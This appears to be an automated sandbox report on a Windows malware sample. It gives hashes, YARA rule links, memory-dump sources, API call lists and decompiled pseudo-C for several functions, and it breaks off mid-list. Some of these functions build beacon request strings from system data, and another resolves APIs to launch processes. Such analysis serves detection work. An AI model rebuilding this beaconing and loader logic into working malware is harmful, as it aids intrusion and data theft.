Instruction ID: 6886bf46c03c7ef1e2ed1cdb87400ecf11c165337ba49592ac7560da8aaa5eda
Opcode Fuzzy Hash: 45cb675d8c484d481f01a33e02f433d40c83f97fe9d38c95d3e04eba8e8989dd
Instruction Fuzzy Hash: 9761F230A09212EBCB29CF29E8D063A73A1FB85354B66813BD847C7395E730DC82DB44

Uniqueness

Uniqueness Score: -1.00%

Function 6E242184, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6E242184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E2422EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E2423A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E242290(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E2422EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E242387(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6e242188
0x6e242189
0x6e24218a
0x6e24218d
0x6e24218f
0x6e242192
0x6e242193
0x6e242195
0x6e242196
0x6e242197
0x6e24219a
0x6e2421a4
0x6e242255
0x6e24225c
0x6e242265
0x6e2421aa
0x6e2421aa
0x6e2421b0
0x6e2421b6
0x6e2421b9
0x6e2421bc
0x6e2421c0
0x6e2421c5
0x6e2421ca
0x6e24224a
0x00000000
0x6e2421cc
0x6e2421cc
0x6e2421d8
0x6e2421da
0x6e242235
0x6e242235
0x6e24223b
0x00000000
0x6e2421dc
0x6e2421eb
0x6e2421ed
0x6e2421ee
0x6e2421ef
0x6e2421f2
0x6e2421f2
0x6e2421f4
0x00000000
0x6e2421f6
0x6e2421f6
0x6e242240
0x6e2421f8
0x6e2421f8
0x6e2421fc
0x6e242204
0x6e242209
0x6e24220e
0x6e24221a
0x6e242222
0x6e242229
0x6e24222f
0x6e242233
0x00000000
0x6e242233
0x6e2421f6
0x6e2421f4
0x00000000
0x6e2421da
0x6e24224e
0x6e24224e
0x6e24224e
0x6e2421ca
0x6e24226a
0x6e242271

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 8b69f22701550772ae3ac4672f66ccbf7e7b83a2c97b503ba86b16b1ca9e8669
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: F721B6B790020ADFD704DFAADC809A7BBAAFF49350B0585A8D919DB245D730FA15C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 001DB0CC, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E001DB0CC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E001DB237(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E001DB2F1(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E001DB1DC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E001DB237(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E001DB2D3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x001db0d0
0x001db0d1
0x001db0d2
0x001db0d5
0x001db0d7
0x001db0da
0x001db0db
0x001db0dd
0x001db0de
0x001db0df
0x001db0e2
0x001db0ec
0x001db19d
0x001db1a4
0x001db1ad
0x001db0f2
0x001db0f2
0x001db0f8
0x001db0fe
0x001db101
0x001db104
0x001db108
0x001db10d
0x001db112
0x001db192
0x00000000
0x001db114
0x001db114
0x001db120
0x001db122
0x001db17d
0x001db17d
0x001db183
0x00000000
0x001db124
0x001db133
0x001db135
0x001db136
0x001db137
0x001db13a
0x001db13a
0x001db13c
0x00000000
0x001db13e
0x001db13e
0x001db188
0x001db140
0x001db140
0x001db144
0x001db14c
0x001db151
0x001db156
0x001db162
0x001db16a
0x001db171
0x001db177
0x001db17b
0x00000000
0x001db17b
0x001db13e
0x001db13c
0x00000000
0x001db122
0x001db196
0x001db196
0x001db196
0x001db112
0x001db1b2
0x001db1b9

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 2b5cd1ae7ea42c1643ec1ed6e504827795fb704a42e2e8ccea90491d92f5bb04
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: E121D672904204EFCB10EF69C8D19ABB7A5FF44350B478569E8169B345D730F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E2B52AD, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.480938016.000000006E2B5000.00000040.00020000.sdmp, Offset: 6E2B5000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: a4250ecb91f2d0e0442a4b444d6d90b5e5cabf007552f291ea6bea7a0520f8ce
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 3C1181737806059FD754CE99EC90E92B39BEB992747298066ED04CF305E676E841C760

Uniqueness

Uniqueness Score: -1.00%

Function 6E2B56A6, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.480938016.000000006E2B5000.00000040.00020000.sdmp, Offset: 6E2B5000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 9bc7ffd5cc2ff2433024137912339952aed0afd214d0e7945aa0dce51622cd7e
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 0D01F5373A420ACFD704CB6DD894D69B7EAEBC1369B15807EC446CBA15E234E842C520

Uniqueness

Uniqueness Score: -1.00%

Function 001D2941, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E001D2941(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x1dd018; // 0xd1eb352c
				asm("bswap eax");
				_t27 =  *0x1dd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x1dd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E001DD00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x1dd2a4; // 0x2dca5a8
				_t3 = _t30 + 0x1de633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d154, _t29, _t28, _t27, _t26, E001DD02C,  *0x1dd004, _t25);
				_t33 = E001D2914();
				_t34 =  *0x1dd2a4; // 0x2dca5a8
				_t4 = _t34 + 0x1de673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E001D3F0E(_t91);
				if(_t96 != 0) {
					_t83 =  *0x1dd2a4; // 0x2dca5a8
					_t6 = _t83 + 0x1de8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x1dd238, 0, _t96);
				}
				_t97 = E001D1363();
				if(_t97 != 0) {
					_t78 =  *0x1dd2a4; // 0x2dca5a8
					_t8 = _t78 + 0x1de8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x1dd238, 0, _t97);
				}
				_t98 =  *0x1dd32c; // 0x2fa95b0
				_a32 = E001D18D5(0x1dd00a, _t98 + 4);
				_t42 =  *0x1dd2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x1dd2a4; // 0x2dca5a8
					_t11 = _t74 + 0x1de8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x1dd2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x1dd2a4; // 0x2dca5a8
					_t13 = _t71 + 0x1de8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x1dd238, 0, 0x800);
					if(_t100 != 0) {
						E001D6852(GetTickCount());
						_t50 =  *0x1dd32c; // 0x2fa95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x1dd32c; // 0x2fa95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x1dd32c; // 0x2fa95b0
						_t103 = E001D8840(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x1dc2ac);
							_push(_t103);
							_t62 = E001D8007();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E001D6146(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E001D45F1();
								}
								HeapFree( *0x1dd238, 0, _v44);
							}
							HeapFree( *0x1dd238, 0, _t103);
						}
						HeapFree( *0x1dd238, 0, _t100);
					}
					HeapFree( *0x1dd238, 0, _a24);
				}
				HeapFree( *0x1dd238, 0, _t105);
				return _a12;
			}

0x001d2941
0x001d2941
0x001d2941
0x001d2946
0x001d294c
0x001d2956
0x001d2958
0x001d2958
0x001d2965
0x001d2970
0x001d2973
0x001d297e
0x001d2981
0x001d2986
0x001d2989
0x001d298e
0x001d2991
0x001d299d
0x001d29aa
0x001d29ac
0x001d29b2
0x001d29b7
0x001d29c2
0x001d29c4
0x001d29c7
0x001d29ce
0x001d29d2
0x001d29d4
0x001d29d9
0x001d29e5
0x001d29e7
0x001d29f3
0x001d29f5
0x001d29f5
0x001d2a00
0x001d2a04
0x001d2a06
0x001d2a0b
0x001d2a17
0x001d2a19
0x001d2a25
0x001d2a27
0x001d2a27
0x001d2a2d
0x001d2a40
0x001d2a44
0x001d2a4b
0x001d2a4e
0x001d2a53
0x001d2a5e
0x001d2a60
0x001d2a63
0x001d2a63
0x001d2a65
0x001d2a6c
0x001d2a6f
0x001d2a74
0x001d2a7e
0x001d2a80
0x001d2a88
0x001d2aa1
0x001d2aa5
0x001d2ab1
0x001d2ab6
0x001d2abf
0x001d2ad0
0x001d2ad4
0x001d2add
0x001d2ae3
0x001d2af0
0x001d2afd
0x001d2b03
0x001d2b0f
0x001d2b15
0x001d2b16
0x001d2b1b
0x001d2b21
0x001d2b27
0x001d2b2e
0x001d2b35
0x001d2b3b
0x001d2b42
0x001d2b46
0x001d2b51
0x001d2b56
0x001d2b5c
0x001d2b65
0x001d2b65
0x001d2b76
0x001d2b76
0x001d2b85
0x001d2b85
0x001d2b94
0x001d2b94
0x001d2ba6
0x001d2ba6
0x001d2bb5
0x001d2bc6

APIs

GetTickCount.KERNEL32 ref: 001D2958
wsprintfA.USER32 ref: 001D29A5
wsprintfA.USER32 ref: 001D29C2
wsprintfA.USER32 ref: 001D29E5
HeapFree.KERNEL32(00000000,00000000), ref: 001D29F5
wsprintfA.USER32 ref: 001D2A17
HeapFree.KERNEL32(00000000,00000000), ref: 001D2A27
wsprintfA.USER32 ref: 001D2A5E
wsprintfA.USER32 ref: 001D2A7E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001D2A9B
GetTickCount.KERNEL32 ref: 001D2AAB
RtlEnterCriticalSection.NTDLL(02FA9570), ref: 001D2ABF
RtlLeaveCriticalSection.NTDLL(02FA9570), ref: 001D2ADD

Part of subcall function 001D8840: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,001D2AF0,?,02FA95B0), ref: 001D886B
Part of subcall function 001D8840: lstrlen.KERNEL32(?,?,?,001D2AF0,?,02FA95B0), ref: 001D8873
Part of subcall function 001D8840: strcpy.NTDLL ref: 001D888A
Part of subcall function 001D8840: lstrcat.KERNEL32(00000000,?), ref: 001D8895
Part of subcall function 001D8840: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,001D2AF0,?,02FA95B0), ref: 001D88B2

StrTrimA.SHLWAPI(00000000,001DC2AC,?,02FA95B0), ref: 001D2B0F

Part of subcall function 001D8007: lstrlen.KERNEL32(02FA9918,00000000,00000000,7742C740,001D2B1B,00000000), ref: 001D8017
Part of subcall function 001D8007: lstrlen.KERNEL32(?), ref: 001D801F
Part of subcall function 001D8007: lstrcpy.KERNEL32(00000000,02FA9918), ref: 001D8033
Part of subcall function 001D8007: lstrcat.KERNEL32(00000000,?), ref: 001D803E

lstrcpy.KERNEL32(00000000,?), ref: 001D2B2E
lstrcpy.KERNEL32(00000000,00000000), ref: 001D2B35
lstrcat.KERNEL32(00000000,?), ref: 001D2B42
lstrcat.KERNEL32(00000000,00000000), ref: 001D2B46

Part of subcall function 001D6146: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 001D61F8

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 001D2B76
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D2B85
HeapFree.KERNEL32(00000000,00000000,?,02FA95B0), ref: 001D2B94
HeapFree.KERNEL32(00000000,00000000), ref: 001D2BA6
HeapFree.KERNEL32(00000000,?), ref: 001D2BB5

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: fc9b350bca0062f0518be227d968482b2bf9be8088d338dceb333b7857de0b08
Instruction ID: cb2462daad67176db176e2e6ae9521e67cce951e1e7f41ba590d23be8ee83113
Opcode Fuzzy Hash: fc9b350bca0062f0518be227d968482b2bf9be8088d338dceb333b7857de0b08
Instruction Fuzzy Hash: 9C619F71503202AFC721ABA8EC84F667BE8EF88350F040517F948D7671DB35E985DB65

Uniqueness

Uniqueness Score: -1.00%

Function 6E27AA10, Relevance: 19.7, APIs: 13, Instructions: 172COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 6E27AA47
_strncmp.LIBCMT ref: 6E27AA69
_strncmp.LIBCMT ref: 6E27AA8B

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: _strncmp
String ID:
API String ID: 909875538-0
Opcode ID: c444bfdbbaf6dd546ba66a4cabcb92db74929d0173adcdc962e52be3aa016cb8
Instruction ID: aef3cef9f04ad0ae90455034eb7005d4b5b2cd982321898dfad2d7607ca95451
Opcode Fuzzy Hash: c444bfdbbaf6dd546ba66a4cabcb92db74929d0173adcdc962e52be3aa016cb8
Instruction Fuzzy Hash: 9D41E9ABB4651933F2605BC9AD02F8BA6176BF0756F048422EB44DA2C4F334D82DC7E0

Uniqueness

Uniqueness Score: -1.00%

Function 001D4744, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E001D4744(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x1dd33c; // 0x2fa9bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E001D66E7(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x1dc1ac;
				}
				_t46 = E001D92DB(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E001D7E20(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x1dd2a4; // 0x2dca5a8
						_t16 = _t75 + 0x1deb28; // 0x530025
						 *0x1dd11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E001D66E7(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x1dc1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E001D7E20(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E001DA5FA(_v20);
						} else {
							_t66 =  *0x1dd2a4; // 0x2dca5a8
							_t31 = _t66 + 0x1dec48; // 0x73006d
							 *0x1dd11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E001DA5FA(_v12);
				}
				return _v24;
			}

0x001d474c
0x001d4752
0x001d4759
0x001d475f
0x001d4763
0x001d4767
0x001d476a
0x001d476f
0x001d4774
0x001d4776
0x001d4776
0x001d477f
0x001d4784
0x001d4789
0x001d478f
0x001d4799
0x001d47a2
0x001d47a9
0x001d47c2
0x001d47c7
0x001d47cc
0x001d47d5
0x001d47de
0x001d47ef
0x001d47f8
0x001d47fc
0x001d4800
0x001d4805
0x001d480a
0x001d480c
0x001d480c
0x001d4816
0x001d481f
0x001d4826
0x001d483e
0x001d4842
0x001d487f
0x001d4844
0x001d4847
0x001d484f
0x001d4860
0x001d486c
0x001d4874
0x001d4878
0x001d4878
0x001d4842
0x001d4887
0x001d488c
0x001d4893

APIs

GetTickCount.KERNEL32 ref: 001D4759
lstrlen.KERNEL32(?,80000002,00000005), ref: 001D4799
lstrlen.KERNEL32(00000000), ref: 001D47A2
lstrlen.KERNEL32(00000000), ref: 001D47A9
lstrlenW.KERNEL32(80000002), ref: 001D47B6
lstrlen.KERNEL32(?,00000004), ref: 001D4816
lstrlen.KERNEL32(?), ref: 001D481F
lstrlen.KERNEL32(?), ref: 001D4826
lstrlenW.KERNEL32(?), ref: 001D482D

Part of subcall function 001DA5FA: HeapFree.KERNEL32(00000000,00000000,001D81B4,00000000,?,?,00000000), ref: 001DA606

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 4c7cea8f7c3f07c5e1f370ff0a55056344185bb3cd42dfc201d9e9635b7b4543
Instruction ID: cfb44c02719773c3ddca520f3d03887870d65be50b14e92250d021f8e27be06b
Opcode Fuzzy Hash: 4c7cea8f7c3f07c5e1f370ff0a55056344185bb3cd42dfc201d9e9635b7b4543
Instruction Fuzzy Hash: 0C416A7280121AFBCF11AFA4DC0599EBBB9EF44344F014062F904A7361DB36DA51EB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D4EEC, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E001D4EEC(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E001D4896(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E001DA88E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x1dd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x1dd2a4; // 0x2dca5a8
					_t18 = _t47 + 0x1de3e6; // 0x73797325
					_t68 = E001D903C(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x1dd2a4; // 0x2dca5a8
						_t19 = _t50 + 0x1de747; // 0x2fa8cef
						_t20 = _t50 + 0x1de0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E001D9186();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E001D9186();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x1dd238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E001DA5FA(_t70);
				goto L12;
			}

0x001d4ef4
0x001d4ef4
0x001d4f03
0x001d4f0a
0x001d4f0f
0x001d501c
0x001d5023
0x001d5023
0x001d4f1e
0x001d4f26
0x001d4f29
0x001d4f2e
0x001d4f43
0x001d4f49
0x001d4f4a
0x001d4f4d
0x001d4f53
0x001d4f56
0x001d4f5b
0x001d4f63
0x001d4f6f
0x001d4f73
0x001d5003
0x001d4f79
0x001d4f79
0x001d4f7e
0x001d4f85
0x001d4f99
0x001d4f9d
0x001d4fec
0x001d4f9f
0x001d4fa0
0x001d4fa7
0x001d4fc0
0x001d4fc2
0x001d4fc6
0x001d4fcd
0x001d4fe7
0x001d4fcf
0x001d4fd8
0x001d4fdd
0x001d4fdd
0x001d4fcd
0x001d4ffb
0x001d4ffb
0x001d4f73
0x001d500a
0x001d5013
0x001d5017
0x00000000

APIs

Part of subcall function 001D4896: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,001D4F08,?,00000001,?,?,00000000,00000000), ref: 001D48BB
Part of subcall function 001D4896: GetProcAddress.KERNEL32(00000000,7243775A), ref: 001D48DD
Part of subcall function 001D4896: GetProcAddress.KERNEL32(00000000,614D775A), ref: 001D48F3
Part of subcall function 001D4896: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 001D4909
Part of subcall function 001D4896: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 001D491F
Part of subcall function 001D4896: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 001D4935

memset.NTDLL ref: 001D4F56

